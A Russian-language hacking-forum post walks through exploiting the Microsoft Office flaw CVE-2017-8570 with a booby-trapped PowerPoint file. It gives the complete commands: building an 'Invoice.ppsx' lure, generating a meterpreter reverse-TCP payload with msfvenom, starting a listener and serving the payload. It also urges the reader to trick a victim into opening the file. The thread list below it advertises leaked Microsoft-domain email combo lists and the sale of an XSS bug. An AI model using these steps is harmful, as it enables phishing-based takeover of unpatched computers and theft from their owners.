Уязвимость Microsoft Office CVE-2017-8570

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Всем привет. Сегодня разберем такую уязвимость как

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

CVE 2017 8570.



Данная уязвимость позволяет получить доступ к удаленной машине используя специально подготовленный файл PowerPoint, более подробно о ней можете почитать по ссылке:


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

.



Использована она может быть на следующих версиях:

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)
На данный момент уязвимость устранена в текущих обновлениях, но, как мы знаем, что многие пренебрегают обновлениями, что нам конечно на руку.



И так поехали:

1. Заходим по ссылке

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

скачиваем, не забываем читать README.md , там будет рассмотрено три сценария атаки используя данную уязвимость. Мы в данной статье остановимся на первом сценарии.

9ce514b689865b93a02dd.png

Вкратце:

- генерируем наш вредоносный PPSX файл,

- создаем полезную нагрузку и запускаем слушатель.

- запускаем сервер на 80 порту.



Давайте непосредственно приступим к делу.

Создаем в директории «Office8570» новую папку и назовем ее «template», далее переносим файл template.ppsx в эту папку. Если этого не сделать то при генерировании PPSX файла выскочит ошибка.

0386662d61065b161b0f0.png

1.Сейчас генерируем наш PPSX файл, пишем в терминале в одну строчку следующее:

Код:
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc



Не забываем вместо моего ip ставить свой, если кто не знает как узнать свой ip, делается это командой ifconfig. У вас должен появится файл Invoice.ppsx.

a0bc3057535e954b8bedc.png

2. Создаем полезную нагрузку,где будет создан файл shell.exe в каталоге tmp, в моем случае это будет выглядеть следующим образом:

Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe


Для создания полезной нагрузки можем использовать любой другой инструмент, не обязательно использовать msfvenom, главное перенести полезную нагрузку потом в каталог tmp.


Запускаем слушатель:

Код:
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"


3. Далее в терминале пишем следующую строчку

Код:
python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe


по итогу, у нас запустится сервер на 80 порту.

Далее нам осталось впарить файл Invoice.ppsx , и как только его откроют ,с сервера погрузится наша полезная нагрузка.

Всем хорошего вечера и удачного пентеста!!!
 
Название темы
Автор Заголовок Раздел Ответы Дата
Support81 Уязвимость Microsoft Office становится временной бомбой в руках киберпреступников Новости в сети 0
A Продам уязвимость на temu.com, reflected xss, срочно Уязвимости и взлом 5
Support81 Архив или троянский конь? критическая уязвимость в 7-ZIP угрожает миллионам устройств Новости в сети 0
Support81 Новая 0day-уязвимость в Windows: утечка данных через темы оформления Новости в сети 0
Support81 Скорее обновляться: Tails 6.8.1 устраняет критическую уязвимость в Tor Browser Новости в сети 0
Support81 Zero-click уязвимость обнаружена во всех версиях Windows Новости в сети 0
Support81 Уязвимость в WhatsApp позволяет правительствам отслеживать переписку пользователей Новости в сети 0
Support81 Страшнее, чем «Rapid Reset»: в протоколе HTTPS/2 выявлена новая фундаментальная уязвимость Новости в сети 0
El_IRBIS Интересно WallEscape: Уязвимость и методы её предотвращения. Уязвимости и взлом 0
Support81 Хакеры сами устраняют уязвимость BIG-IP: борьба за эксклюзивный доступ к зараженным системам Новости в сети 0
Support81 Пользователи Windows, будьте осторожны: DarkGate использует уязвимость нулевого дня Новости в сети 0
Emilio_Gaviriya Статья Уязвимость Command Injection Exploiter. Уязвимости и взлом 0
Emilio_Gaviriya Статья Уязвимость IDOR. Вирусология 0
Support81 Ботнет DreamBus использует уязвимость в RocketMQ для распространения майнера Новости в сети 0
Support81 Слив года: уязвимость Vyper стала инструментом массового оттока криптовалюты Новости в сети 0
Support81 Как взломать сайт за 5 минут: уязвимость в плагине Ultimate Member дает полный доступ к WordPress Новости в сети 0
U Уязвимость некорректного сравнения брутим хеш при помощи захвата функции Уязвимости и взлом 0
DOMINUS Новая уязвимость TikTok позволяет собирать личные данные пользователей Новости в сети 1
NickelBlack Интересно Уязвимость Zero Day в Защитнике Windows AV Уязвимости и взлом 1
S OpenSMTPD критическую уязвимость Уязвимости и взлом 0
O Тысячи Android-приложений могут содержать RCE-уязвимость Новости в сети 0
B В антивирусе McAfee нашли уязвимость повышения прав Уязвимости и взлом 0
A Уязвимость в Zoom Новости в сети 0
T Новая уязвимость в VirtualBox, позволяющая выполнить код на стороне хост-системы Полезные статьи 0
F Уязвимость GMail Уязвимости и взлом 0
S Интересная уязвимость одноразовой почты Уязвимости и взлом 1
S Критическая уязвимость в системах шифрования email на основе PGP/GPG и S/MIME Уязвимости и взлом 0
H Найдена уязвимость во всех версиях Windows, которую не закрывает ни один антивирус Новости в сети 0
S Уязвимость SambaCry используется в атаках на сетевые хранилища Новости в сети 0
S Критическая уязвимость в чипах Wi-Fi затрагивает миллионы Android- и iOS-устройств Новости в сети 0
S В Linux обнаружена критическая уязвимость Новости в сети 0
S Уязвимость Stack Clash позволяет повысить права на Linux и других свободных ОС Новости в сети 0
Admin Уязвимость в плагине Mail Masta Plugin 1.0 для WordPress Уязвимости и взлом 0
ValidMail Valid ♋ 32k MICROSOFT DOMAINS WITH VALID 21.05.25 ♋ Раздача email 0
Support81 Плати или рискуй: Microsoft будет брать плату за обновления Windows Новости в сети 0
Support81 Microsoft дала ИИ настоящий инструмент программиста — и он впервые узнал, как сложно быть человеком Новости в сети 0
BinaryCloud (62.263 lines) Semi Private Microsoft Domain Leak Раздача email 0
BinaryCloud (101.200 lines) Good leak Microsoft Domain BinaryCloud Раздача email 0
BinaryCloud (78.231 lines) Good leak Microsoft Domain BinaryCloud Раздача email 0
BinaryCloud (73.764 lines) Semi Private Microsoft Domain Leak Раздача email 0
BinaryCloud (58.262 lines) UHQ Leak Combos Microsoft Domain Раздача email 0
BinaryCloud (93.164 lines) Semi Private Microsoft Domain Leak Раздача email 0
BinaryCloud (89.879 lines) UHQ Leak Combos Microsoft Domain Раздача email 0
BinaryCloud (117.025 lines) Semi Private Microsoft Domain Leak Раздача email 0
BinaryCloud (69.533 lines) Semi Private Microsoft Domain Leak Раздача email 0
BinaryCloud (63.984 lines) UHQ Leak Combos Microsoft Domain Раздача email 0
BinaryCloud (109.903 lines) Good leak Microsoft Domain BinaryCloud Раздача email 0
BinaryCloud (117.840 lines) Semi Private Microsoft Domain Leak Раздача email 0
BinaryCloud (94.664 lines) Semi Private Microsoft Domain Leak Раздача email 0
BinaryCloud (102.339 lines) Good leak Microsoft Domain BinaryCloud Раздача email 0

Название темы